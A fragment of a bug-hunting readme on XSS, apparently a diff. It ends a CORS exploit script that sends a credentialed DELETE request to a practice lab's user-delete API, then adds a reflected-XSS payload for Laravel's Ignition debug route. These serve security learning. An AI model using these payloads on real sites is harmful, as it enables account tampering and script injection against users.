CharanCodeCraft/Bug_hunting/Clientside injection(XSS)/readme.md

 var req = new XMLHttpRequest(); req.onload = reqListener; req.open('delete','http://cors.bepractical.tech/api/user/   delete',true); req.withCredentials = true; req.send('{}'); function reqListener() { alert(this.responseText); };
 }
 </script>`
+### RXSS in Laravel framework
+* If u find a website laravel framework then u can check for RXSS
+* There is chance of XSS if debug mode is on in `/_ignition/execute-solution`
+* Payload - `/_ignition/scripts/--%3E%3Csvg%20onload=alert('cappriciosec.com')%3E`